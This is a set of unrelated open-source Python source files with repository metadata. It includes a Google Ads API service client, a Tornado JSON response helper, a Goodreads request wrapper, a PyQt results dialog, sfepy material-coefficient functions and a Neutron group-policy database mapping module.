mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdScheduleViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdScheduleViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> AdScheduleViewServiceTransport:
"""Return the transport used by the client instance.
Returns:
AdScheduleViewServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def ad_schedule_view_path(
customer_id: str, campaign_id: str, criterion_id: str,
) -> str:
"""Return a fully-qualified ad_schedule_view string."""
return "customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}".format(
customer_id=customer_id,
campaign_id=campaign_id,
criterion_id=criterion_id,
)
@staticmethod
def parse_ad_schedule_view_path(path: str) -> Dict[str, str]:
"""Parse a ad_schedule_view path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adScheduleViews/(?P<campaign_id>.+?)~(?P<criterion_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, AdScheduleViewServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the ad schedule view service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.AdScheduleViewServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(
os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
)
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT
if is_mtls
else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, AdScheduleViewServiceTransport):
# transport is a AdScheduleViewServiceTransport instance.
if credentials:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = AdScheduleViewServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_ad_schedule_view(
self,
request: ad_schedule_view_service.GetAdScheduleViewRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> ad_schedule_view.AdScheduleView:
r"""Returns the requested ad schedule view in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.GetAdScheduleViewRequest`):
The request object. Request message for
[AdScheduleViewService.GetAdScheduleView][google.ads.googleads.v8.services.AdScheduleViewService.GetAdScheduleView].
resource_name (:class:`str`):
Required. The resource name of the ad
schedule view to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.AdScheduleView:
An ad schedule view summarizes the
performance of campaigns by AdSchedule
criteria.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a ad_schedule_view_service.GetAdScheduleViewRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, ad_schedule_view_service.GetAdScheduleViewRequest
):
request = ad_schedule_view_service.GetAdScheduleViewRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_ad_schedule_view
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("resource_name", request.resource_name),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
__all__ = ("AdScheduleViewServiceClient",)
|
apache-2.0
| -5,497,888,377,128,880,000
| 40.45
| 132
| 0.621943
| false
| 4.550399
| false
| false
| false
|
francoricci/sapspid
|
lib/response.py
|
1
|
4278
|
#import jsonlib2
import globalsObj
import logging
import traceback
import tornado.web
#import ujson
#import simplejson
import jsonpickle
import uuid
class Result(object):
def __init__(self, **kwargs):
#self.rootLogger = logging.getLogger('root')
for name, value in kwargs.items():
exec("self." + name + " = value")
def reload(self,**kwargs):
self.__init__(**kwargs)
class Error(object):
def __init__(self, **kwargs):
#self.rootLogger = logging.getLogger('root')
for name, value in kwargs.items():
exec("self." + name + " = value")
def setSection(self,section):
if globalsObj.errors_configuration.has_section(section):
errorsDict = dict(globalsObj.errors_configuration.items(section))
for key, val in enumerate(errorsDict.keys()):
exec("self." + val + " = errorsDict[val]")
#if self.code is not None:
# self.code = int(self.code)
return True
else:
logging.getLogger(__name__).error("Error section %s not present" % (section))
return False
def reload(self,**kwargs):
self.__init__(**kwargs)
class ResponseObj(object):
def __init__(self, ID = None, **kwargs):
#self.rootLogger = logging.getLogger('root')
self.apiVersion = globalsObj.configuration.get('version','version')
self.error = None
self.result = None
self.setID(ID)
self.error = Error(**kwargs)
def setResult(self, **kwargs):
self.result = Result(**kwargs)
def setError(self, section=None):
if section is not None:
if self.error.setSection(section):
return True
else:
return False
def setID(self, ID):
if ID is None or ID == "":
self.id = str(uuid.uuid4())
else:
self.id = ID
def jsonWrite(self):
try:
#jsonOut = jsonlib2.write(self, default=lambda o: o.__dict__,sort_keys=False, indent=4,escape_slash=False)
jsonOut = jsonpickle.encode(self, unpicklable=False)
#jsonOut = ujson.dumps(self, ensure_ascii=False, indent=4)
#jsonOut2 = simplejson.dumps(pippo, ensure_ascii=False, indent=4)
return jsonOut
except BaseException as error:
logging.getLogger(__name__).error("Error on json encoding %s" % (error.message))
return False
class RequestHandler(tornado.web.RequestHandler):
@property
def executor(self):
return self.application.executor
def compute_etag(self):
return None
def write_error(self, status_code, errorcode = '3', **kwargs):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_status(status_code)
# debug info
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
debugTmp = ""
for line in traceback.format_exception(*kwargs["exc_info"]):
debugTmp += line
getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason)
else:
getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason)
getResponse.setError(errorcode)
getResponse.setResult()
self.write(getResponse.jsonWrite())
self.finish()
class StaticFileHandler(tornado.web.StaticFileHandler):
def compute_etag(self):
return None
def write_error(self, status_code, errorcode = '3', **kwargs):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_status(status_code)
# debug info
if self.settings.get("serve_traceback") and "exc_info" in kwargs:
debugTmp = ""
for line in traceback.format_exception(*kwargs["exc_info"]):
debugTmp += line
getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason)
else:
getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason)
getResponse.setError(errorcode)
getResponse.setResult()
self.write(getResponse.jsonWrite())
self.finish()
|
mit
| -6,579,047,088,402,858,000
| 31.907692
| 119
| 0.605423
| false
| 4.032045
| false
| false
| false
|
tatianass/goodreads2
|
goodreads/request.py
|
1
|
1066
|
import requests
import xmltodict
import json
class GoodreadsRequestException(Exception):
def __init__(self, error_msg, url):
self.error_msg = error_msg
self.url = url
def __str__(self):
return self.url, ':', self.error_msg
class GoodreadsRequest():
def __init__(self, client, path, query_dict, req_format='xml'):
"""Initialize request object."""
self.params = query_dict
self.params.update(client.query_dict)
self.host = client.base_url
self.path = path
self.req_format = req_format
def request(self):
resp = requests.get(self.host+self.path, params=self.params, timeout=60)
if resp.status_code != 200:
raise GoodreadsRequestException(resp.reason, self.path)
if self.req_format == 'xml':
data_dict = xmltodict.parse(resp.content)
return data_dict['GoodreadsResponse']
elif self.req_format == 'json':
return json.loads(resp.content)
else:
raise Exception("Invalid format")
|
mit
| -593,627,982,775,317,100
| 30.352941
| 80
| 0.61257
| false
| 3.933579
| false
| false
| false
|
gem/sidd
|
ui/dlg_result.py
|
1
|
7317
|
# Copyright (c) 2011-2013, ImageCat Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
dialog for editing mapping scheme branches
"""
from PyQt4.QtGui import QDialog, QCloseEvent, QAbstractItemView
from PyQt4.QtCore import Qt, pyqtSlot, QSettings, QVariant, QString, QAbstractTableModel
from operator import itemgetter
from sidd.constants import logAPICall, SIDD_COMPANY, SIDD_APP_NAME, SIDD_VERSION, CNT_FIELD_NAME
from ui.constants import logUICall, UI_PADDING
from ui.qt.dlg_res_detail_ui import Ui_tablePreviewDialog
class DialogResult(Ui_tablePreviewDialog, QDialog):
"""
dialog for visualize result details
"""
# CONSTANTS
#############################
UI_WINDOW_GEOM = 'dlg_result/geometry'
# constructor
###############################
def __init__(self):
super(DialogResult, self).__init__()
self.ui = Ui_tablePreviewDialog()
self.ui.setupUi(self)
self.ui.table_result.setSelectionMode(QAbstractItemView.SingleSelection)
self.ui.table_result.setSortingEnabled(True)
# connect slots (ui event)
self.ui.btn_ok.clicked.connect(self.accept)
self.settings = QSettings(SIDD_COMPANY, '%s %s' %(SIDD_APP_NAME, SIDD_VERSION));
self.restoreGeometry(self.settings.value(self.UI_WINDOW_GEOM).toByteArray());
# window event handler overrides
#############################
def resizeEvent(self, event):
""" handle window resize """
self.ui.table_result.resize(self.width()-2*UI_PADDING,
self.height() - self.ui.table_result.y()-self.ui.btn_ok.height()-2*UI_PADDING)
below_table = self.height() - self.ui.btn_ok.height() - UI_PADDING
self.ui.lb_bldgcount.move(UI_PADDING, below_table)
self.ui.txt_bldgcount.move(self.ui.lb_bldgcount.width()+(2*UI_PADDING), below_table)
self.ui.btn_ok.move(self.width()-UI_PADDING-self.ui.btn_ok.width(), below_table)
@pyqtSlot(QCloseEvent)
def closeEvent(self, event):
self.settings.setValue(self.UI_WINDOW_GEOM, self.saveGeometry());
super(DialogResult, self).closeEvent(event)
# public method
###############################
@logUICall
def showExposureData(self, header, selected):
"""
display selected rows with header
"""
fnames =[] # retrieve field name as table headers
cnt_sum = 0 # total number of buildings
# find index for building count field
cnt_idx = -1
for i, f in header.iteritems():
fnames.append(f.name())
if f.name() == CNT_FIELD_NAME:
cnt_idx = i
if cnt_idx <> -1: # building count index is found
# increment building count
for s in selected:
cnt_sum += s[cnt_idx].toDouble()[0]
# display result
self.resultDetailModel = ResultDetailTableModel(header.values(), selected)
self.ui.table_result.setModel(self.resultDetailModel)
self.ui.table_result.sortByColumn(3, Qt.AscendingOrder)
# display exposure specific ui elements
self.ui.txt_bldgcount.setVisible(True)
self.ui.lb_bldgcount.setVisible(True)
self.ui.txt_bldgcount.setText('%d'% round(cnt_sum))
self.ui.txt_bldgcount.setReadOnly(True)
@logUICall
def showInfoData(self, header, selected):
# sync UI
self.resultDetailModel = ResultDetailTableModel(header.values(), selected)
self.ui.table_result.setModel(self.resultDetailModel)
# hide exposure specific ui elements
self.ui.txt_bldgcount.setVisible(False)
self.ui.lb_bldgcount.setVisible(False)
class ResultDetailTableModel(QAbstractTableModel):
"""
table model supporting visualization of result detail
"""
# constructor
###############################
def __init__(self, fields, selected):
""" constructor """
QAbstractTableModel.__init__(self)
# table header
self.headers = fields
# create copy of values to be shown and modified
# this format makes it easier to sort
self.selected = []
for row in selected:
new_row = []
for i, v in enumerate(row.values()):
if self.headers[i].type() == QVariant.Int:
new_row.append(v.toInt()[0])
elif self.headers[i].type() == QVariant.Double:
new_row.append(v.toDouble()[0])
else:
new_row.append(str(v.toString()))
self.selected.append(new_row)
# override public method
###############################
@logAPICall
def columnCount(self, parent):
""" only two columns exist. always return 2 """
return len(self.headers)
@logAPICall
def rowCount(self, parent):
""" number of rows same as number of siblings """
return len(self.selected)
@logAPICall
def headerData(self, section, orientation, role):
""" return data to diaply for header row """
if role == Qt.DisplayRole:
if orientation == Qt.Horizontal:
return QString(self.headers[section].name())
else:
# no vertical header
return QVariant()
else:
return QVariant()
@logAPICall
def data(self, index, role):
""" return data to be displayed in a cell """
if role == Qt.DisplayRole:
logAPICall.log('row %s column %s ' %(index.row(), index.column()),
logAPICall.DEBUG_L2)
return QString("%s" % self.selected[index.row()][index.column()])
else:
return QVariant()
def sort(self, ncol, order):
""" sort table """
if ncol < 0 or ncol > len(self.headers):
return
self.layoutAboutToBeChanged.emit()
self.selected.sort(key=itemgetter(ncol), reverse=(order==Qt.DescendingOrder))
self.layoutChanged.emit()
def flags(self, index):
""" cell condition flag """
# NOTE:
# ItemIsEditable flag requires data() and setData() function
return Qt.ItemIsEnabled
|
agpl-3.0
| 7,166,657,375,103,733,000
| 37.708108
| 138
| 0.569906
| false
| 4.117614
| false
| false
| false
|
certik/sfepy
|
sfepy/mechanics/matcoefs.py
|
1
|
3273
|
from sfepy.base.base import *
##
# c: 22.07.2008
def youngpoisson_to_lame( young, poisson, plane = 'stress' ):
if plane == 'stress':
lam = young*poisson/(1.0 - poisson*poisson)
mu = young/(2.0*(1.0 + poisson))
elif plane == 'strain':
lam = young*poisson/((1.0 + poisson)*(1.0 - 2.0*poisson))
mu = young/(2.0*(1.0 + poisson))
return {'lambda' : lam, 'mu' : mu }
##
# c: 22.07.2008
def stiffness_tensor_lame( dim, lam, mu ):
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return lam * oot + mu * nm.diag( o + 1.0 )
##
# c: 22.07.2008
def stiffness_tensor_youngpoisson( dim, young, poisson, plane = 'stress' ):
lame = youngpoisson_to_lame( young, poisson, plane )
return stiffness_tensor_Lame( dim, lame['lambda'], lame['mu'] )
class TransformToPlane( Struct ):
"""Transformmations of constitutive law coefficients of 3D problems to 2D."""
def __init__( self, iplane = None ):
"""`iplane` ... vector of indices denoting the plane, e.g.: [0, 1]"""
if iplane is None:
iplane = [0, 1]
# Choose the "master" variables and the "slave" ones
# ... for vectors
i_m = nm.sort( iplane )
i_s = nm.setdiff1d( nm.arange( 3 ), i_m )
# ... for second order tensors (symmetric storage)
i_ms = {(0, 1) : [0, 1, 3],
(0, 2) : [0, 2, 4],
(1, 2) : [1, 2, 5]}[tuple( i_m )]
i_ss = nm.setdiff1d( nm.arange( 6 ), i_ms )
Struct.__init__( self, iplane = iplane,
i_m = i_m, i_s = i_s,
i_ms = i_ms, i_ss = i_ss )
def tensor_plane_stress( self, c3 = None, d3 = None, b3 = None ):
"""Transforms all coefficients of the piezoelectric constitutive law
from 3D to plane stress problem in 2D: strain/stress ordering/ 11 22
33 12 13 23. If `d3` is None, uses only the stiffness tensor `c3`.
`c3` ... stiffness tensor
`d3` ... dielectric tensor
`b3` ... piezoelectric coupling tensor"""
mg = nm.meshgrid
cs = c3[mg(self.i_ss,self.i_ss)]
cm = c3[mg(self.i_ss,self.i_ms)].T
if d3 is None: # elasticity only.
A = cs
Feps = cm
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
return c2
else:
dm = d3[mg(self.i_s,self.i_m)].T
ds = d3[mg(self.i_s,self.i_s)]
ii = mg( self.i_s, self.i_ss )
A = nm.r_[nm.c_[cs, b3[ii]],
nm.c_[b3[ii].T, -ds]] #=> sym !!!
F = nm.r_[nm.c_[cm, b3[mg(self.i_m,self.i_ss)]],
nm.c_[b3[mg(self.i_s,self.i_ms)].T, -dm ]]
Feps = F[:,:3]
FE = F[:,3:]
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
d2 = d3[mg(self.i_m,self.i_m)] \
- nm.dot( FE.T, nm.dot( Ainv, FE ) )
b2 = b3[mg(self.i_m,self.i_ms)].T \
- nm.dot( FE.T, nm.dot( Ainv, Feps ) )
return c2, d2, b2
|
bsd-3-clause
| 2,795,579,541,998,849,000
| 32.060606
| 81
| 0.486709
| false
| 2.748111
| false
| false
| false
|
oneconvergence/group-based-policy
|
gbpservice/neutron/db/grouppolicy/group_policy_mapping_db.py
|
1
|
18294
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sa
from sqlalchemy import orm
from neutron.common import log
from neutron.db import model_base
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from gbpservice.neutron.db import gbp_quota_db as gquota
from gbpservice.neutron.db.grouppolicy import group_policy_db as gpdb
LOG = logging.getLogger(__name__)
class PolicyTargetMapping(gpdb.PolicyTarget):
"""Mapping of PolicyTarget to Neutron Port."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
# REVISIT(ivar): Set null on delete is a temporary workaround until Nova
# bug 1158684 is fixed.
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete='SET NULL'),
nullable=True, unique=True)
class PTGToSubnetAssociation(model_base.BASEV2):
"""Many to many relation between PolicyTargetGroup and Subnets."""
__tablename__ = 'gp_ptg_to_subnet_associations'
policy_target_group_id = sa.Column(
sa.String(36), sa.ForeignKey('gp_policy_target_groups.id'),
primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
primary_key=True)
class PolicyTargetGroupMapping(gpdb.PolicyTargetGroup):
"""Mapping of PolicyTargetGroup to set of Neutron Subnets."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
subnets = orm.relationship(PTGToSubnetAssociation,
cascade='all', lazy="joined")
class L2PolicyMapping(gpdb.L2Policy):
"""Mapping of L2Policy to Neutron Network."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'),
nullable=True, unique=True)
class L3PolicyRouterAssociation(model_base.BASEV2):
"""Models the many to many relation between L3Policies and Routers."""
__tablename__ = 'gp_l3_policy_router_associations'
l3_policy_id = sa.Column(sa.String(36), sa.ForeignKey('gp_l3_policies.id'),
primary_key=True)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),
primary_key=True)
class L3PolicyMapping(gpdb.L3Policy):
"""Mapping of L3Policy to set of Neutron Routers."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
routers = orm.relationship(L3PolicyRouterAssociation,
cascade='all', lazy="joined")
class ExternalSegmentMapping(gpdb.ExternalSegment):
"""Mapping of L2Policy to Neutron Network."""
__table_args__ = {'extend_existing': True}
__mapper_args__ = {'polymorphic_identity': 'mapping'}
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
nullable=True, unique=True)
gquota.DB_CLASS_TO_RESOURCE_NAMES[L3PolicyMapping.__name__] = 'l3_policy'
gquota.DB_CLASS_TO_RESOURCE_NAMES[L2PolicyMapping.__name__] = 'l2_policy'
gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetGroupMapping.__name__] = (
'policy_target_group')
gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetMapping.__name__] = (
'policy_target')
gquota.DB_CLASS_TO_RESOURCE_NAMES[ExternalSegmentMapping.__name__] = (
'external_segment')
class GroupPolicyMappingDbPlugin(gpdb.GroupPolicyDbPlugin):
"""Group Policy Mapping interface implementation using SQLAlchemy models.
"""
def _make_policy_target_dict(self, pt, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_policy_target_dict(pt)
res['port_id'] = pt.port_id
return self._fields(res, fields)
def _make_policy_target_group_dict(self, ptg, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_policy_target_group_dict(ptg)
res['subnets'] = [subnet.subnet_id for subnet in ptg.subnets]
return self._fields(res, fields)
def _make_l2_policy_dict(self, l2p, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_l2_policy_dict(l2p)
res['network_id'] = l2p.network_id
return self._fields(res, fields)
def _make_l3_policy_dict(self, l3p, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_l3_policy_dict(l3p)
res['routers'] = [router.router_id for router in l3p.routers]
return self._fields(res, fields)
def _make_external_segment_dict(self, es, fields=None):
res = super(GroupPolicyMappingDbPlugin,
self)._make_external_segment_dict(es)
res['subnet_id'] = es.subnet_id
return self._fields(res, fields)
def _set_port_for_policy_target(self, context, pt_id, port_id):
with context.session.begin(subtransactions=True):
pt_db = self._get_policy_target(context, pt_id)
pt_db.port_id = port_id
def _add_subnet_to_policy_target_group(self, context, ptg_id, subnet_id):
with context.session.begin(subtransactions=True):
ptg_db = self._get_policy_target_group(context, ptg_id)
assoc = PTGToSubnetAssociation(policy_target_group_id=ptg_id,
subnet_id=subnet_id)
ptg_db.subnets.append(assoc)
return [subnet.subnet_id for subnet in ptg_db.subnets]
def _set_network_for_l2_policy(self, context, l2p_id, network_id):
with context.session.begin(subtransactions=True):
l2p_db = self._get_l2_policy(context, l2p_id)
l2p_db.network_id = network_id
def _add_router_to_l3_policy(self, context, l3p_id, router_id):
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3p_id)
assoc = L3PolicyRouterAssociation(l3_policy_id=l3p_id,
router_id=router_id)
l3p_db.routers.append(assoc)
return [router.router_id for router in l3p_db.routers]
def _set_subnet_to_es(self, context, es_id, subnet_id):
with context.session.begin(subtransactions=True):
es_db = self._get_external_segment(context, es_id)
es_db.subnet_id = subnet_id
def _update_ess_for_l3p(self, context, l3p_id, ess):
with context.session.begin(subtransactions=True):
l3p_db = self._get_l3_policy(context, l3p_id)
self._set_ess_for_l3p(context, l3p_db, ess)
def _get_l3p_ptgs(self, context, l3p_id):
return super(GroupPolicyMappingDbPlugin, self)._get_l3p_ptgs(
context, l3p_id, l3p_klass=L3PolicyMapping,
ptg_klass=PolicyTargetGroupMapping, l2p_klass=L2PolicyMapping)
@log.log
def create_policy_target(self, context, policy_target):
pt = policy_target['policy_target']
tenant_id = self._get_tenant_id_for_create(context, pt)
with context.session.begin(subtransactions=True):
pt_db = PolicyTargetMapping(id=uuidutils.generate_uuid(),
tenant_id=tenant_id,
name=pt['name'],
description=pt['description'],
policy_target_group_id=
pt['policy_target_group_id'],
port_id=pt['port_id'])
context.session.add(pt_db)
return self._make_policy_target_dict(pt_db)
@log.log
def get_policy_targets(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
marker_obj = self._get_marker_obj(context, 'policy_target', limit,
marker)
return self._get_collection(context, PolicyTargetMapping,
self._make_policy_target_dict,
filters=filters, fields=fields,
sorts=sorts, limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
@log.log
def create_policy_target_group(self, context, policy_target_group):
ptg = policy_target_group['policy_target_group']
tenant_id = self._get_tenant_id_for_create(context, ptg)
with context.session.begin(subtransactions=True):
if ptg['service_management']:
self._validate_service_management_ptg(context, tenant_id)
ptg_db = PolicyTargetGroupMapping(
id=uuidutils.generate_uuid(), tenant_id=tenant_id,
name=ptg['name'], description=ptg['description'],
l2_policy_id=ptg['l2_policy_id'],
network_service_policy_id=ptg['network_service_policy_id'],
shared=ptg.get('shared', False),
service_management=ptg.get('service_management', False))
context.session.add(ptg_db)
if 'subnets' in ptg:
for subnet in ptg['subnets']:
assoc = PTGToSubnetAssociation(
policy_target_group_id=ptg_db.id,
subnet_id=subnet
)
ptg_db.subnets.append(assoc)
self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg)
return self._make_policy_target_group_dict(ptg_db)
